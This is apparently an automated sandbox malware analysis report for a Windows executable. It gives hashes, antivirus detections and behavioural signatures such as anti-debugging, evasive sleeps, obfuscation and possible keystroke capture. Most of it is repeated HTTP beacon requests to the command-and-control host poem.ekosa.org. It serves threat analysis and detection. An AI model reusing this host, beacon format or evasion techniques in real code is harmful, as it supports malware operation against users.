Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report WVbU1Gf5p8

Overview

General Information

Sample Name:WVbU1Gf5p8 (renamed file extension from none to exe)
Analysis ID:338142
MD5:69f7cde70cc22aceb5dd32ff1dc3f685
SHA1:f87ee3079aaa5230e107ff9684e7cdea2162caf6
SHA256:625f63364312cec78a4c91abedba868d551d79185ff73e388f561017b13347f0

Most interesting Screenshot:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Submitted sample is a known malware sample
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • WVbU1Gf5p8.exe (PID: 6344 cmdline: 'C:\Users\user\Desktop\WVbU1Gf5p8.exe' MD5: 69F7CDE70CC22ACEB5DD32FF1DC3F685)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: WVbU1Gf5p8.exeAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: WVbU1Gf5p8.exeVirustotal: Detection: 71%Perma Link
Source: WVbU1Gf5p8.exeReversingLabs: Detection: 66%
Machine Learning detection for sampleShow sources
Source: WVbU1Gf5p8.exeJoe Sandbox ML: detected
Source: WVbU1Gf5p8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: WVbU1Gf5p8.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\WVbU1Gf5p8.exeCode function: 0_2_012385AB FindFirstFileExA,0_2_012385AB
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?id=dn678 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: poem.ekosa.orgConnection: Keep-Alive
